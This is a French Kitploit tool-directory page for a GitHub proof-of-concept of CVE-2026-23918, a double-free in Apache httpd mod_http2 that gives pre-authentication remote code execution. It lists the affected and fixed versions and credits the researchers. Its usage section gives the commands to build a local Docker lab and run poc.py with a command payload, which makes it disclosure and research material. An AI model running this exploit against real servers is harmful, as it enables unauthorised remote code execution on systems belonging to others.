Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-23918 — Double-free dans le nettoyage des flux de mod_http2 d'Apache httpd menant à une RCE pré-auth. | Kitploit
Outils/GitHubGitHub/striga-ai/cve-2026-23918
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationExploitation de Binaires
GitHubstriga-ai/cve-2026-23918

CVE-2026-23918

Double-free dans le nettoyage des flux de mod_http2 d'Apache httpd menant à une RCE pré-auth.

Voir le dépôt
3164il y a 4 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-23918

Double-free dans le nettoyage de flux mod_http2 d'Apache httpd conduisant à une exécution de code à distance (RCE) avant authentification.

Affecté : httpd 2.4.66 avec mod_http2 et MPM multi-threadé (event/worker). Corrigé dans : 2.4.67.

Découvert et rapporté par Bartlomiej Dmitruk (striga.ai) et Stanislaw Strzalkowski (isec.pl).

Analyse : https://striga.ai/research/apache-httpd-mod-http2-double-free

Prérequis

  • Docker
  • Python 3

Utilisation

Construire et démarrer l'environnement vulnérable :

root@kitploit:~
docker build -t httpd-poc .
docker run -d --name httpd-poc --privileged -p 9443:443 httpd-poc

Obtenir les adresses de system() et du scoreboard :

root@kitploit:~
docker exec httpd-poc python3 /getaddr.py 1

Exécuter l'exploit :

root@kitploit:~
python3 poc.py --host localhost --port 9443 \
    --cmd 'date >> /tmp/win' --workers 64 \
    --system <system_addr> --scoreboard <scoreboard_addr>

Vérifier (l'exécution est probabiliste, peut prendre de quelques minutes à plusieurs heures) :

root@kitploit:~
docker exec httpd-poc cat /tmp/win

Nettoyage

root@kitploit:~
docker rm -f httpd-poc
Télécharger l’outil